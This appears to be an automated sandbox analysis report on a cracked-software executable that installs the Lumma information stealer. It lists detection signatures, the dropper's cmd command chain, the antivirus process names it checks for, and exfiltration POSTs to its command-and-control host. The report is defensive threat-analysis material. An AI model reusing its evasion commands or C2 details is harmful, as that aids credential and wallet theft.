Windows Analysis Report
vce exam simulator 2.2.1 crackk.exe

Overview

General Information

Sample name: vce exam simulator 2.2.1 crackk.exe
Analysis ID: 1580415
MD5: 636555b743ce6aeb326544eb56e8b5e9
SHA1: 18a672fa6c98b7f54e2c49daf5b33d92925a9ca4
SHA256: 863f990882827996b28b0d7efc6f02c9b734a4ea8f7ef18d777bc8ed8ff214cc

Detection

Detected family: LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

  • System is w10x64
  • vce exam simulator 2.2.1 crackk.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe" MD5: 636555B743CE6AEB326544EB56E8B5E9)
    • cmd.exe (PID: 7396 cmdline: "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7456 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7464 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7500 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7508 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7552 cmdline: cmd /c md 459250 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7568 cmdline: findstr /V "Sorry" Branches MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7584 cmdline: cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Spa.com (PID: 7600 cmdline: Spa.com y MD5: 62D09F076E6E0240548C2F837536A46A)
      • choice.exe (PID: 7616 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: Spa.com PID: 7600 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: Spa.com PID: 7600 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Spa.com PID: 7600 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7396, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7508, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T13:52:40.597951+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:42.837509+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:45.420635+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49738 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:48.910081+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:51.213434+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:53.831695+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49741 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:56.289015+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49742 | 104.21.33.227 | 443 | TCP
2024-12-24T13:53:00.764066+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:41.425333+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:43.719925+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | TCP
2024-12-24T13:53:01.644646+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:41.425333+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:43.719925+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:49.806140+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 104.21.33.227 | 443 | TCP
2024-12-24T13:52:56.292468+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 104.21.33.227 | 443 | TCP

Source: vce exam simulator 2.2.1 crackk.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: vce exam simulator 2.2.1 crackk.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: SyncInfrastructurePS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-string-obsolete-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msiwer.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ms-win-security-lsalookup-l2-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: IEFileInstallAI.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wksprtPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrle32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: sqlxmlx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mfH263Enc.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-registry-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-sddl-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odfox32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: pcwum.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmcodecdspps.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: SEMgrPS.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: WSClient.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: TTDPlm.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: MFVFW.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaurl.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msdaer.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: cmlua.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msrating.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: rnr20.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: uniplat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wlanutil.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tient.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir50_32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: shfolder.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerfCounterInstaller.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-threadpool-private-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msimtf.pdbUGP source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: odtext32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: riched32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: hmmapi.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: wmdrmsdk.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: spwinsat.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: avicap32.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: msxactps.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: PerceptionSimulation.ProxyStubs.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: API-MS-Win-Core-ProcessTopology-Obsolete-L1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: tapisysprep.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: svcext.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: mrt_map.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ir41_qcx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: VirtualDisplayManager.ProxyStubs.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\459250\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
            Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\459250

            Networking

            Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49737 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49736 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49737 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49742 -> 104.21.33.227:443
            Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.33.227:443
            Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.33.227:443
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 47
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=2D2UJO7589V6LA
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 18139
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=MTRJJO06
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8724
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=6EVNCTOU
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 20377
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=KRE4KMW7W5DD
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 1236
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=2FZJYP1YF9HPNRO
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 558955
                Host: bithithol.click
            Source: global traffic HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 82
                Host: bithithol.click
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global traffic DNS traffic detected: DNS query: UJXheBevpnMncefcEO.UJXheBevpnMncefcEO
            Source: global traffic DNS traffic detected: DNS query: bithithol.click
            Source: unknown HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: bithithol.click
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 104.21.33.227:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\RentalSpeakers
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\CreatingContributor
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\SaddamConfigure
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\NoneCurrency
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\FormulaFairy
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\ExposedGrove
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe File created: C:\Windows\PleasureGalaxy
            Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\459250\Spa.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameMSBuild.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodbccr32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamentlanui2.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameProximityCommon.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamemprext.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameDELEGATORPROVIDER.DLLj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameVirtualDisplayManager.ProxyStubs.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamesystem.management.resources.dllT vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameodpdx32.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenamenetbios.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exeBinary or memory string: OriginalFilenameappxreg.dllj% vs vce exam simulator 2.2.1 crackk.exe
            Source: vce exam simulator 2.2.1 crackk.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: vce exam simulator 2.2.1 crackk.exe, Binary string: ComponentIdBTH\MS_BTHPANNdi\InterfacesUpperRangendis4ndis5ndis5_ipndis4bdandis1394LowerRangeLocalTalkNetCfgInstanceIdCharacteristics\Device\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Server\ServerLevels\ServerCoreServerCoreExtendedServer-Gui-MgmtServer-Gui-Shell
            Source: vce exam simulator 2.2.1 crackk.exe, Binary or memory string: .SLN,
            Source: vce exam simulator 2.2.1 crackk.exe, Binary or memory string: .SLN
            Source: vce exam simulator 2.2.1 crackk.exe, Binary or memory string: , MSBuild.exe Solution.sln /p:Configuration=Debug /p:Platform="Any CPU")
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@22/21@2/1
            Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe, File created: C:\Users\user\AppData\Local\Temp\nsa86B2.tmp
            Source: vce exam simulator 2.2.1 crackk.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: vce exam simulator 2.2.1 crackk.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.23%
            Source: C:\Windows\SysWOW64\tasklist.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe, File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Spa.com, 0000000A.00000003.2051241546.0000000001D73000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: vce exam simulator 2.2.1 crackk.exe, String found in binary or memory: . \r\n\r\n/InstallStateDir=[
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe, File read: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe
            Source: unknown, Process created: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe "C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe"
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Walls Walls.cmd & Walls.cmd
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 459250
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Sorry" Branches
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Penalties + ..\Let + ..\No + ..\Giant + ..\Instance + ..\Reed + ..\Hawk y
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Users\user\AppData\Local\Temp\459250\Spa.com Spa.com y
            Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\Desktop\vce exam simulator 2.2.1 crackk.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder, Window detected: More than 3 window changes detected
            Source: vce exam simulator 2.2.1 crackk.exe, Static file information: File size 927079465 > 1048576
            Source: vce exam simulator 2.2.1 crackk.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: msrating.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: d.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
            Source: Binary string: ifsutilx.pdbGCTL source: vce exam simulator 2.2.1 crackk.exe
